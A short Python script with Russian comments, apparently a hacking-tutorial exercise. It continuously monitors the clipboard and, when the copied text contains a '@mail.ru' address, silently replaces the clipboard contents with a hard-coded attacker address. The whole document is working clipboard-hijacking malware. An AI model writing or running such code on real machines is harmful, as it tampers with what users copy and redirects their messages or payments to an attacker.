# Напиши программу, которая в цикле мониторит буфер обмена, периодически получая из него текст с помощью pyperclip.paste().
# И если видит, что кем‑то был скопирован email, заменяет этот email другим, заранее прописанным в коде, помещая его в буфер обмена командой pyperclip.copy('coolhacker@xakep.ru')
# Подключаем модуль для работы буфера обмена
import pyperclip
# Подключим модуль для работы с системным временем
import time
# Задаём переменную old и присваиваем ей пустую строку
old = ''
# Начинаем бесконечный цикл слежения за буфером обмена
while True:
    # Кладём в переменную s содержимое буфера обмена
    s = pyperclip.paste()
    # Если полученное содержимое не равно предыдущему, то:
    if s != old:
        # Печатаем его
        print(s)
        # В переменную old записываем текущее пойманое значение
        # Чтобы в следующий виток цикла не повторяться и не печатать, то что уже поймано
        old = s
    # Иначе если мы видим, что в буфер обмена копируется @mail, то автоматически меняем на свой.
    elif '@mail.ru' in s:
        pyperclip.copy('coolhacker@xakep.ru')
    # В конце витка цикла делаем паузу в одну секунду, чтобы содержимое буфера обмена успело прогрузиться
    time.sleep(1)
